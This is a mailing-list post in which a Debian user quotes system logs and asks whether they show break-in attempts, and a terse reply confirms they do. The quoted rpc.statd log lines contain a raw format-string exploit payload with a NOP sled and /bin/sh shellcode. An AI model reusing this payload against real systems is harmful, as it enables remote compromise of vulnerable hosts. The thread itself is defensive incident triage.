[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Are these breakin attempts?




Yes, they are likely breakin attempts. Why in the *world* are you running rpc.statd (or portmap, or...nevermind...some people can't be helped) on a publicly accessable machine. That's flat out stupid. Ken Seefried, CISSP Christian Jaeger writes:
Hello, I run a pc with potato on a cable modem line. Recently I discovered the following in /var/log/messages:
Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\ Jun 10 20:33:55 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ Jun 10 21:01:16 pflanze -- MARK --
Jun 11 13:41:16 pflanze -- MARK --
Jun 11 13:47:10 pflanze
Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\ Jun 11 13:47:10 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ Jun 11 14:01:16 pflanze -- MARK --
Jun 12 09:01:16 pflanze -- MARK --
Jun 12 09:09:47 pflanze
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\ 220\220\220\220\220\220\220\220\220\220\220\220\220 Jun 12 09:09:47 pflanze Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ Jun 12 09:21:16 pflanze -- MARK -- Seems like a buffer overflow. (Is it happening in rpc.statd or in named or somewhere else?) I've now removed nfs-common && nfs-server. (BTW there's still running a daemon (portmap, from netbase) on the sunrpc port - I thought sunrpc is only (mainly?) for NFS?) After that I've installed ippl, which gives some interesting output as well: Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com [172.189.201.98] Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com [66.66.4.173] Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com [66.66.4.173] Jun 17 11:04:36 webcache connection attempt from ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45] Jun 17 18:14:47 sunrpc connection attempt from h24-79-83-253.vc.shawcable.net [24.79.83.253] Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz [62.168.55.246]
Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
Jun 18 00:07:26 port 445 connection attempt from  [62.2.179.7]
Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7] Now when I think about it these will probably all be harmless (maybe others on this cable modem subnet were serving stuff when they had my ip). If yes, please apologize my anxiety. .christian.

--  To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org




Reply to: